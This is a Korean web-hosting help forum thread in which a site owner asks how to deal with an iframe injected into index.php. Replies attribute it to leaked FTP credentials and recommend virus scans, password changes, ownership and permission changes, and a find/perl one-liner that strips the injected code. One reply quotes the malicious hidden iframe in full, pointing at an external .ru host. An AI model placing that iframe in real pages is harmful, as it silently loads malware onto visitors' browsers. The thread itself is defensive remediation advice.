index.php 변조 대처법좀 알려주세요. 정보
index.php 변조 대처법좀 알려주세요.관련링크
http://bbbcafe.or.kr/xe
95회 연결
본문
안녕하세요.
새로 홈페이지를 구축하려고 하는데, index 파일만들면 하단에 iframe이 삽입되어
홈페이지 작동이 안됩니다.
변조된 파일을 찾는 방법과
예방법을 좀 알려주세요.
또 변조가 아파치쪽에도 일어나나요? 아파치쪽 파일이 바뀐것은 어떻게 찾는지도 좀 알려주세요.
이경우 루트 패스워드도 해킹이 일어났는지 알 수 있을까요?
예방법으로는 웹방화벽만 설치하면 되는지? 아니면 몇가지 더 점검해야하는지도 좀
알려주시면 좋겠습니다.
감사합니다.
새로 홈페이지를 구축하려고 하는데, index 파일만들면 하단에 iframe이 삽입되어
홈페이지 작동이 안됩니다.
변조된 파일을 찾는 방법과
예방법을 좀 알려주세요.
또 변조가 아파치쪽에도 일어나나요? 아파치쪽 파일이 바뀐것은 어떻게 찾는지도 좀 알려주세요.
이경우 루트 패스워드도 해킹이 일어났는지 알 수 있을까요?
예방법으로는 웹방화벽만 설치하면 되는지? 아니면 몇가지 더 점검해야하는지도 좀
알려주시면 좋겠습니다.
감사합니다.
댓글 전체
위 링크 아이프레임인젝션걸리 페이지를 열었을 경우에도 걸립니다. 링크 클릭하지 마세요..!!!!
FTP 아이디, 패스워드가 노출되어 발생되는 아이프레임 인젝션에 걸리신 것입니다.
검색에 아이프레임을 넣고 치시면 많은 유사 문제들이 나옵니다. 참고하세요
http://sir.co.kr/bbs/board.php?bo_table=g4_qa&wr_id=135031
대처법은 위의 내용을 참고하세요.
1. 본인의 컴퓨터 바이러스체크 및 복구
2. FTP 계정 비번변경
3. 아이프레임일괄삭제
(아이프레임 내용이 같을 경우에는 일괄삭제 하시고
<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden"> 삽입된 경우 일괄삭제
find . -type f -exec perl -pi -e 's|<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden">||g' {} \;
다를경우는 find로 아이프레임을 찾아 파일들을 수정하셔야 합니다.)
4. 몇일뒤에도 계속 아이프레임이 발생된다면 계정변경(마지막방법)신청
FTP 아이디, 패스워드가 노출되어 발생되는 아이프레임 인젝션에 걸리신 것입니다.
검색에 아이프레임을 넣고 치시면 많은 유사 문제들이 나옵니다. 참고하세요
http://sir.co.kr/bbs/board.php?bo_table=g4_qa&wr_id=135031
대처법은 위의 내용을 참고하세요.
1. 본인의 컴퓨터 바이러스체크 및 복구
2. FTP 계정 비번변경
3. 아이프레임일괄삭제
(아이프레임 내용이 같을 경우에는 일괄삭제 하시고
<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden"> 삽입된 경우 일괄삭제
find . -type f -exec perl -pi -e 's|<iframe src="http://3b9.ru:8080/index.php" width=148 height=146 style="visibility: hidden">||g' {} \;
다를경우는 find로 아이프레임을 찾아 파일들을 수정하셔야 합니다.)
4. 몇일뒤에도 계속 아이프레임이 발생된다면 계정변경(마지막방법)신청
감사드립니다. 우선은 모두 삭제했는데, 앞으로 어떻게 될지 모르겠습니다.
계속해서 지우는것 밖에 없을듯 합니다.
일단 한국이외의 아이피는 모두 차단 신청했습니다.ㅠㅠ
계속해서 지우는것 밖에 없을듯 합니다.
일단 한국이외의 아이피는 모두 차단 신청했습니다.ㅠㅠ
본인이 작업하시는 컴퓨터를 바이러스 체크하신다음에...
ftp 계정 비밀번호 변경하시고
iframe 들어간 페이지 수정하신다음 다시 시도해보세요
본인 컴퓨터를 먼저 체크하세요...
접속하시는 분이 혼자라면요...
ftp 계정 비밀번호 변경하시고
iframe 들어간 페이지 수정하신다음 다시 시도해보세요
본인 컴퓨터를 먼저 체크하세요...
접속하시는 분이 혼자라면요...
root 권한이 있다면
ftp 계정이 아니 다른 계정의 소유권으로 바꾸세요.(chown)
ftp 계정이 아니 다른 계정의 소유권으로 바꾸세요.(chown)
답변해주신 분들께 감사드립니다. 여러모로 점검해 보겠습니다.
검색해보다가 혹시 저와같은 문제로 검색해보시는분 보라고 답글 달아요~
우선적으로 근본적인 원인부터 차단해 주시는게 좋겠지만 임시방편으로 위분들 뎃글처럼
파일명이 index, default, main, home 등 첫페이지로 연결되거나 첫페이지를 연상시키는 단어가 포함된파일명을 가진 파일에 아이프레임 삽입 등 변조가 이루어 졌을경우
1.변조가 이루어진 파일의 복구
2.컴퓨터 바이러스체크 / 치료
3.FTP아이디 비밀번호 변경
4.변조가 이루어졌던 해당 파일의 퍼미션을 504로 바꿔 주시면 임시방편으로는 변조가 이루어 지지않는것같습니다.
해당파일을 수정할때 퍼미션을 조절해야하는 번거로움이 있으나 외부에서 접근해서도 변조가 이루어지지않으니 근본적인 원인을 찾기전까진 추가적으로 변조되거나 하지는 않는거같네요
우선적으로 근본적인 원인부터 차단해 주시는게 좋겠지만 임시방편으로 위분들 뎃글처럼
파일명이 index, default, main, home 등 첫페이지로 연결되거나 첫페이지를 연상시키는 단어가 포함된파일명을 가진 파일에 아이프레임 삽입 등 변조가 이루어 졌을경우
1.변조가 이루어진 파일의 복구
2.컴퓨터 바이러스체크 / 치료
3.FTP아이디 비밀번호 변경
4.변조가 이루어졌던 해당 파일의 퍼미션을 504로 바꿔 주시면 임시방편으로는 변조가 이루어 지지않는것같습니다.
해당파일을 수정할때 퍼미션을 조절해야하는 번거로움이 있으나 외부에서 접근해서도 변조가 이루어지지않으니 근본적인 원인을 찾기전까진 추가적으로 변조되거나 하지는 않는거같네요
